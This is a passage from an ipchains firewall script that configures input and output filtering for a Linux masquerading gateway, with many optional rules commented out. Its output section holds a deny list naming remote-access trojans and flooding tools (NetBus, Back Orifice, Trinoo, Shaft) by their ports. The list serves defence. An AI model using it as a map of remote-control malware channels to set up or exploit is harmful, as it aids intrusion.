ssh #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $HOST2IP -d $INTIP telnet #-------------------------------------------------------------------- # Incoming Traffic from the External Interface #-------------------------------------------------------------------- # This ruleset will control specific traffic that is allowed in from # the external interface. #-------------------------------------------------------------------- # echo " - Setting input filters for traffic from the external interface." # DHCP Clients. # # If you get a dynamic IP address for your ADSL or Cablemodem connection, you # will need to enable these lines. # # Enabled by default. /sbin/ipchains -A input -j ACCEPT -i $EXTIF -p udp -s $UNIVERSE bootps -d $BROADCAST/0 bootpc /sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $UNIVERSE bootps -d $BROADCAST/0 bootpc # FTP: Allow external users to connect to the Linux server ITSELF for # PORT-style FTP services. This will NOT work for PASV FTP transfers. # # Disabled by default. # echo " Optional parameter: FTP server" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP ftp #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP ftp-data # HTTP: Allow external users to connect to the Linux server ITSELF for # HTTP services. # # Disabled by default. # echo " Optional parameter: WWW server" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP http # ICMP: Allow ICMP packets from all external TCP/IP addresses. # # NOTE: Disabling ICMP packets via the firewall ruleset can do far more than # just stop people from pinging your machine. Many aspects of TCP/IP and its # associated applications rely on various ICMP messages. Without ICMP, both # your Linux server and internal Masq'ed computers might not work. # /sbin/ipchains -A input -j ACCEPT -i $EXTIF -p icmp -s $UNIVERSE -d $EXTIP # NNTP: Allow external computers to connect to the Linux server ITSELF # for NNTP (news) services. # # Disabled by default. # echo " Optional parameter: NNTP server" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP nntp # NTP: Allow external computers to connect to the Linux server ITSELF for # NTP (time) updates # # NOTE: Some NTP clients require TCP traffic. Others require UDP. # Your pick! # # Disabled by default. # echo " Optional parameter: NTP server" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP ntp #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p udp -s $UNIVERSE -d $EXTIP ntp # TELNET: Allow external computers to connect to the Linux server ITSELF for # TELNET access. # # Disabled by default. # echo " Optional parameter: TELNET server" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP telnet # SSH server: Allow external computers to connect to the Linux server ITSELF # for SSH access. # # Disabled by default. # echo " Optional parameter: SSH server" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP ssh #-------------------------------------------------------------------- # Specific Input Rejections on the EXTERNAL interface #-------------------------------------------------------------------- # These rulesets reject specific traffic that you do not want into # the system. #-------------------------------------------------------------------- echo " - Reject specific inputs." # Remote interface, claiming to be local machines, IP spoofing, get lost & log /sbin/ipchains -A input -j REJECT -i $EXTIF -s $INTLAN -d $UNIVERSE $LOGGING # NFS: Reject NFS traffic FROM and TO external machines. # # NOTE: NFS is one of the biggest security issues an administrator will face. # Do NOT enable NFS over the Internet or any non-trusted networks unless you # know exactly what you are doing. # # NOTE #2: the $LOGGING variable is NOT included here because if it was # enabled, your logs would grow too quickly to manage. # /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP 2049 /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE 2049 -d $EXTIP # SMB: Reject SMB traffic FROM and TO external machines. # # NOTE: SMB is one of the biggest security issues an administrator will face. # Do NOT enable SMB over the Internet or any non-trusted networks unless you # know exactly what you are doing. # # NOTE #2: the $LOGGING variable is NOT included here because if it was # enabled, your logs would grow too quickly to manage. # echo " - Silently rejecting TCP/UDP SMB traffic on the external internface." /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP 137 /sbin/ipchains -A input -j REJECT -i $EXTIF -p udp -s $UNIVERSE -d $EXTBROAD 137 /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTBROAD 137 /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP 138 /sbin/ipchains -A input -j REJECT -i $EXTIF -p udp -s $UNIVERSE -d $EXTBROAD 138 /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTBROAD 138 /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE -d $EXTIP 139 /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE 137 -d $EXTIP /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE 138 -d $EXTIP /sbin/ipchains -A input -j REJECT -i $EXTIF -p tcp -s $UNIVERSE 139 -d $EXTIP #-------------------------------------------------------------------- # Incoming Traffic on all Interfaces #-------------------------------------------------------------------- # This will control input traffic for all interfaces. This is # usually used for what could be considered as public services. #-------------------------------------------------------------------- echo " - Setting input filters for public services (all interfaces)." # AUTH: Allow the authentication protocol, ident, to function on all # interfaces but disable it in /etc/inetd.conf. The reason to # allow this traffic in but block it via Inetd is because some # legacy TCP/IP stacks don't deal with REJECTed "auth" requests # properly. # /sbin/ipchains -A input -j ACCEPT -p tcp -s $UNIVERSE -d $UNIVERSE auth # BOOTP/DHCP: Reject all stray bootp traffic. # # Disabled by default. #/sbin/ipchains -A input -j REJECT -p udp -s $UNIVERSE bootpc # DNS: If you are running an authoritative DNS server, you must open # up the DNS ports on all interfaces to allow lookups. If you are # running a caching DNS server, you will need to at least open the DNS # ports to internal interfaces. # # It is recommend to secure DNS by restricting zone transfers and split # DNS servers as documented in Step 4. # # Disabled by default. # echo " Optional parameter: DNS server" #/sbin/ipchains -A input -j ACCEPT -p tcp -s $UNIVERSE -d $UNIVERSE domain #/sbin/ipchains -A input -j ACCEPT -p udp -s $UNIVERSE -d $UNIVERSE domain # RIP: Reject all stray RIP traffic. Many improperly configured # networks propagate network routing protocols to the edge of the # network. The follow line will allow you explicitly filter it here # without logging to SYSLOG. # # Disabled by default. #/sbin/ipchains -A input -j REJECT -p udp -s $UNIVERSE -d $UNIVERSE route # SMTP: If this server is an authoritative SMTP email server, you must # allow SMTP traffic to all interfaces. # # Disabled by default. # echo " Optional parameter: SMTP server" #/sbin/ipchains -A input -j ACCEPT -p tcp -s $UNIVERSE -d $EXTIP smtp # SQUID Proxy w/ JunkBuster # # If you are using Squid w/ Junkbuster enabled (Banner filtering), you will # need to enable the following lines to do the IPCHAINS port redirection to # port 3128. This also assumes that you have Squid properly configured and # running. # # Disabled by default. #echo " Optional parameter: SQUID transparent proxy" #/sbin/ipchains -A input -j ACCEPT -i $LOOPBACKIF -p tcp -d $LOOPBACKIP/32 www #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $INTLAN -d $INTIP/32 www #/sbin/ipchains -A input -j REDIRECT 3128 -i $INTIF -p tcp -s $INTLAN -d $BROADCAST/0 www $LOGGING #-------------------------------------------------------------------- # Specific Input Rejections from ANY interface #-------------------------------------------------------------------- # These rulesets reject specific traffic that you do not want out of # the system. #-------------------------------------------------------------------- #echo " - Reject traffic for specific domains." #Do not allow ANY internal hosts to be able to reach the following sites: # #Disabled by default. #The Doubleclick example will filter ALL types of traffic to the given # class-C networks including WWW, SMTP(email, etc traffic. If you # want a slightly less restrictive example, see the AOL example. # #Doubleclick.net and .com is reknown for their WWW ad banners # #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 63.160.54.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 128.11.92.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 199.95.206.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 199.95.207.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 199.95.208.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 199.95.210.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 204.178.112.160/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 204.253.104.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 208.10.202.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 208.203.243.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 208.211.225.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 208.228.86.0/24 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 209.67.38.0/24 #AOL.com is reknown for their users sending SPAM to millions of people on # the Inet. Though you might want to filter email from them, you # might want to still be able to go look at some of their their # WWW pages. This example ONLY filters EMAIL and nothing else. # #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 152.163.159.0/24 25 #/sbin/ipchains -A input -j REJECT -i $INTIF -p tcp -s $UNIVERSE -d 205.188.157.0/24 25 #-------------------------------------------------------------------- # Explicit INPUT Access from external LAN Hosts #-------------------------------------------------------------------- # This controls external access from specific external hosts (secure hosts). # This example permits FTP, FTP-DATA, SSH, POP-3 and TELNET traffic from a # secure host INTO the firewall. In addition to these input rules, we must also # explicitly allow the traffic from the remote host to get out. See the rules # in the output section for more details # # Disabled as default. #-------------------------------------------------------------------- echo " - Setting input filters for explicit external hosts." # The secure host # #echo " * Allowing $SECUREHOST INPUT for ftp, ftp-data, ssh, pop-3, and telnet" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST -d $EXTIP ftp #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST -d $EXTIP ftp-data #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST -d $EXTIP ssh #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST -d $EXTIP pop-3 #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST -d $EXTIP telnet #echo " * Allowing $SECUREHOST2 INPUT for ftp, ftp-data, ssh, pop-3, and telnet" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST2 -d $EXTIP ftp #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST2 -d $EXTIP ftp-data #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST2 -d $EXTIP ssh #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST2 -d $EXTIP pop-3 #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST2 -d $EXTIP telnet #echo " * Allowing $SECUREHOST3 INPUT for ftp, ftp-data, ssh, pop-3, and telnet" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST3 -d $EXTIP ftp #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST3 -d $EXTIP ftp-data #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST3 -d $EXTIP ssh #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST3 -d $EXTIP pop-3 #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST3 -d $EXTIP telnet #echo " * Allowing $SECUREHOST4 INPUT for ftp, ftp-data, ssh, pop-3, and telnet" #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST4 -d $EXTIP ftp #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST4 -d $EXTIP ftp-data #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST4 -d $EXTIP ssh #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST4 -d $EXTIP pop-3 #/sbin/ipchains -A input -j ACCEPT -i $EXTIF -p tcp -s $SECUREHOST4 -d $EXTIP telnet # Allow ALL internal interfaces to access the Inet # ------------------------------------------------ # Local interface, local machines, going anywhere is valid. # # The main reason why this is at the BOTTOM of the INPUT section is to make sure # that all required DENY/REJECT firewall lines are hit before allowing all internal # traffic. If you DON'T want to allow ALL internal traffic to get out to the # Internet, put a "#" in the front of the line below and un-#ed out the lines # at the top of this section to allow only specific internal HOSTS to get out. # # Comment this line out if you want to only allow specific traffic on the # internal network. /sbin/ipchains -A input -j ACCEPT -i $INTIF -s $INTLAN -d $UNIVERSE # Loopback interface is valid. /sbin/ipchains -A input -j ACCEPT -i $LOOPBACKIF -s $UNIVERSE -d $UNIVERSE # HIGH PORTS: # # Enable all high unprivileged ports for all reply TCP/UDP traffic # # NOTE: The use of the "! -y" flag filters TCP traffic that doesn't have the # SYN bit set. In other words, this means that any traffic that is # trying to initiate traffic to your server on a HIGH port will be # rejected. # # The only HIGH port traffic that will be accepted is either return # traffic that the server originally initiated or UDP-based traffic. # # NOTE2: Please note that port 20 for ACTIVE FTP sessions should NOT use # SYN filtering. Because of this, we must specifically allow it in. # echo " - Enabling all input REPLY (TCP/UDP) traffic on high ports." /sbin/ipchains -A input -j ACCEPT ! -y -p tcp -s $UNIVERSE -d $EXTIP $UNPRIVPORTS /sbin/ipchains -A input -j ACCEPT -p tcp -s $UNIVERSE ftp-data -d $EXTIP $UNPRIVPORTS /sbin/ipchains -A input -j ACCEPT -p udp -s $UNIVERSE -d $EXTIP $UNPRIVPORTS #-------------------------------------------------------------------- # Catch All INPUT Rule #-------------------------------------------------------------------- # echo " - Final input catch all rule." # All other incoming is denied and logged. /sbin/ipchains -A input -j REJECT -s $UNIVERSE -d $UNIVERSE $LOGGING #******************************************************************** # Output Rules #******************************************************************** echo "----------------------------------------------------------------------" echo "Output Rules:" #-------------------------------------------------------------------- # Outgoing Traffic on the Internal LAN #-------------------------------------------------------------------- # This ruleset provides policies for traffic that is going out on the internal # LAN. # # In this example, all traffic is allowed out. Therefore there is no # requirement to implement individual filters. However, as with the input # section above, examples are given for demonstrative purposes. It is also # noted that the same rules, outlined above, apply regarding the order of the # filtering rules. #-------------------------------------------------------------------- echo " - Setting output filters for traffic on the internal LAN." # Local interface, any source going to local net is valid. /sbin/ipchains -A output -j ACCEPT -i $INTIF -s $UNIVERSE -d $INTLAN # Loopback interface is valid. /sbin/ipchains -A output -j ACCEPT -i $LOOPBACKIF -s $UNIVERSE -d $UNIVERSE # DHCP: If you have configured a DHCP server on this Linux machine, you # will need to enable the following ruleset. # # Disabled by default. # echo " Optional parameter: DHCPd server" #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p udp -s $INTIP/32 bootps -d $BROADCAST/0 bootpc #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $INTIP/32 bootps -d $BROADCAST/0 bootpc # HTTP: The following is an example of how to allow HTTP traffic to an # intranet WWW server without allowing access from the external # network. # # Disabled by default. # echo " Optional parameter: WWW server" #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $INTIP/32 http -d $INTLAN #-------------------------------------------------------------------- # Explicit Output from Internal LAN Hosts #-------------------------------------------------------------------- # The following rulesets only allow SPECIFIC hosts on the internal LAN to # access services on this firewall server itself. Many people might feel that # this is extreme but many system attacks occur from the INTERNAL network as # well. # # Examples given allow access via FTP, FTP-DATA, SSH, and TELNET. # # In order for this ruleset to work, you must first comment out the line above # that provides full access to the internal LAN by all internal hosts. # # Disabled by default. #-------------------------------------------------------------------- #echo " - Setting output filters for specific internal hosts." # First host #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $HOST1IP -d $INTIP ftp #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $HOST1IP -d $INTIP ftp-data #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $HOST1IP -d $INTIP ssh #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $HOST1IP -d $INTIP telnet # Second host #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $HOST2IP -d $INTIP ftp #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $HOST2IP -d $INTIP ftp-data #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $HOST2IP -d $INTIP ssh #/sbin/ipchains -A output -j ACCEPT -i $INTIF -p tcp -s $HOST2IP -d $INTIP telnet #-------------------------------------------------------------------- # Outgoing Traffic on the External Interface #-------------------------------------------------------------------- # This ruleset will control what traffic can go out on the external interface. #-------------------------------------------------------------------- echo " - Setting input filters for traffic to the external interface." # DHCP Client: If your Linux server is connected via DSL or a Cablemodem # connection and you get dynamic DHCP addresses, you will need to # enable the following rulesets. # # Enabled by default. /sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $UNIVERSE bootpc -d $UNIVERSE bootps /sbin/ipchains -A output -j ACCEPT -i $EXTIF -p udp -s $UNIVERSE bootpc -d $UNIVERSE bootps # FTP: Allow FTP traffic (the Linux server is a FTP server) # # Disabled by default. # echo " Optional parameter: FTP server" #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp -d $UNIVERSE #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp-data -d $UNIVERSE # HTTP: Allow HTTP traffic (the Linux server is a WWW server) # # Disabled by default # echo " Optional parameter: WWW server" #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP http -d $UNIVERSE # NTP: Allow NTP updates (the Linux server is a NTP server) # # NOTE: Some NTP clients require TCP traffic. Others require UDP. # Your pick! # # Disabled by default # echo " Optional parameter: NTP server" #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ntp -d $UNIVERSE #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p udp -s $EXTIP ntp -d $UNIVERSE # TELNET: Allow telnet traffic (the Linux server is a TELNET server) # # Disabled by default # echo " Optional parameter: TELNET server" #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP telnet -d $UNIVERSE # SSH server: Allow outgoing SSH traffic (the Linux server is a SSH server) # # Disabled by default # echo " Optional parameter: SSH server" #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ssh -d $UNIVERSE #-------------------------------------------------------------------- # Outgoing Traffic on all Interfaces #-------------------------------------------------------------------- # This will control output traffic for all interfaces. This is # usually used for what could be considered as public services. It # is noted that we provide a few rejection rulesets as examples but # these are not required due to the overall REJECT statement above. #-------------------------------------------------------------------- echo " - Setting output filters for public services on all interfaces." # AUTH: Allow authentication tap indent on all interfaces (but disable it # in /etc/inetd.conf). # /sbin/ipchains -A output -j ACCEPT -p tcp -s $UNIVERSE auth -d $UNIVERSE # DNS: If you your Linux server is an authoritative DNS server, you must # enable this ruleset # # Disabled by default # echo " Optional parameter: DNS server" #/sbin/ipchains -A output -j ACCEPT -p tcp -s $EXTIP domain -d $UNIVERSE #/sbin/ipchains -A output -j ACCEPT -p udp -s $EXTIP domain -d $UNIVERSE # ICMP: Allow ICMP traffic out # # NOTE: Disabling ICMP packets via the firewall ruleset can do far # more than just stop people from pinging your machine. Many aspects # of TCP/IP and its associated applications rely on various ICMP # messages. Without ICMP, both your Linux server and internal Masq'ed # computers might not work. # /sbin/ipchains -A output -j ACCEPT -p icmp -s $UNIVERSE -d $UNIVERSE # NNTP: This allows NNTP-based news out. # # Disabled by default # echo " Optional parameter: NNTP server" #/sbin/ipchains -A output -j ACCEPT -p tcp -s $EXTIP nntp -d $UNIVERSE # SMTP: If the Linux servers is either an authoritative SMTP server or # relay, you must allow this ruleset. # /sbin/ipchains -A output -j ACCEPT -p tcp -s $EXTIP smtp -d $UNIVERSE #-------------------------------------------------------------------- # Output to Explicit Hosts #-------------------------------------------------------------------- # This controls output to specific external hosts (secure hosts). This example # implementation allows ssh and pop-3 protocols out to the secure host. In # addition to these rules, we must also explicitly allow the traffic in from # the remote host. See the input rules above to see this take place. # # Disabled by default. #-------------------------------------------------------------------- echo " - Setting output filters for explicit external hosts." # The secure host # echo " * Allowing $SECUREHOST OUTPUT for ftp, ftp-data, ssh, pop-3, and telnet" #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp -d $SECUREHOST $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp-data -d $SECUREHOST $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ssh -d $SECUREHOST $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP pop-3 -d $SECUREHOST $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP telnet -d $SECUREHOST $UNPRIVPORT echo " * Allowing $SECUREHOST2 OUTPUT for ftp, ftp-data, ssh, pop-3, and telnet" #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp -d $SECUREHOST2 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp-data -d $SECUREHOST2 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ssh -d $SECUREHOST2 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP pop-3 -d $SECUREHOST2 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP telnet -d $SECUREHOST2 $UNPRIVPORT echo " * Allowing $SECUREHOST3 OUTPUT for ftp, ftp-data, ssh, pop-3, and telnet" #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp -d $SECUREHOST3 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp-data -d $SECUREHOST3 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ssh -d $SECUREHOST3 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP pop-3 -d $SECUREHOST3 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP telnet -d $SECUREHOST3 $UNPRIVPORT echo " * Allowing $SECUREHOST4 OUTPUT for ftp, ftp-data, ssh, pop-3, and telnet" #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp -d $SECUREHOST4 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ftp-data -d $SECUREHOST4 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP ssh -d $SECUREHOST4 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP pop-3 -d $SECUREHOST4 $UNPRIVPORTS #/sbin/ipchains -A output -j ACCEPT -i $EXTIF -p tcp -s $EXTIP telnet -d $SECUREHOST4 $UNPRIVPORT #-------------------------------------------------------------------- # Specific Output Rejections #-------------------------------------------------------------------- # These rulesets reject specific traffic that you do not want out of # the system. #-------------------------------------------------------------------- echo " - Reject specific outputs." # Reject outgoing traffic to the local net from the remote interface, # stuffed routing; deny & log /sbin/ipchains -A output -j REJECT -i $EXTIF -s $UNIVERSE -d $INTLAN $LOGGING # Reject outgoing traffic from the local net from the external interface, # stuffed masquerading, deny and log /sbin/ipchains -A output -j REJECT -i $EXTIF -s $INTLAN -d $UNIVERSE $LOGGING # SMB # /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE 137 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE 138 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE 139 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP 137 -d $UNIVERSE 137 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP 138 -d $UNIVERSE 138 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP 139 -d $UNIVERSE 139 $LOGGING # RPC. # /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE sunrpc $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP sunrpc -d $UNIVERSE $LOGGING # Mountd. # /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE 635 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP 635 -d $UNIVERSE $LOGGING # PPTP. # /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE 1723 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE 1723 $LOGGING # Remote Winsock. # /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE 1745 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE 1745 $LOGGING # NFS. # /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE 2049 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP 2049 -d $UNIVERSE $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE 2049 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP 2049 -d $UNIVERSE $LOGGING # PcAnywhere. # /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE 5631 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE 5631 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE 5632 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE 5632 $LOGGING # Xwindows. # # NOTE: See variable section above for the example range (6000:6007 by default) # Xwindows can use far more than just ports 6000-6007. # /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE $XWINDOWS_PORTS $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE $XWINDOWS_PORTS $LOGGING # NetBus. /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE 12345 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE 12346 $LOGGING # NetBus Pro. /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE/0 20034 $LOGGING # BackOrofice /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP -d $UNIVERSE/0 31337 $LOGGING # Win Crash Trojan. /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE/0 5742 $LOGGING # Socket De Troye. /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE/0 30303 $LOGGING # Unknown Trojan Horse (Master's Paradise [CHR]) /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE/0 40421 $LOGGING # Trinoo UDP flooder - Please note this port will probably change over time /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP 27665 -d $UNIVERSE/0 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP 27444 -d $UNIVERSE/0 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP 31335 -d $UNIVERSE/0 $LOGGING #IPSec VPNs /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP 500 -d $UNIVERSE/0 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP -d $UNIVERSE/0 500 $LOGGING # Shaft distributed flooder - Please note this port will probably change over time /sbin/ipchains -A output -j REJECT -i $EXTIF -p tcp -s $EXTIP 20432 -d $UNIVERSE/0 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP 18753 -d $UNIVERSE/0 $LOGGING /sbin/ipchains -A output -j REJECT -i $EXTIF -p udp -s $EXTIP 20433 -d $UNIVERSE/0 $LOGGING #-------------------------------------------------------------------- # Allow all High Ports for return traffic. # # Some day this ruleset will be stateful and we won't have to do this # echo " - Enabling all output REPLY (TCP/UDP) traffic on high ports." /sbin/ipchains -A output -j ACCEPT -p tcp -s $EXTIP $UNPRIVPORTS -d $UNIVERSE /sbin/ipchains -A output -j ACCEPT -p udp -s $EXTIP $UNPRIVPORTS -d $UNIVERSE #-------------------------------------------------------------------- # Catch All Rule #-------------------------------------------------------------------- echo " - Final output catch all rule." # All other outgoing is denied and logged. This ruleset should catch # everything including samba that hasn't already been 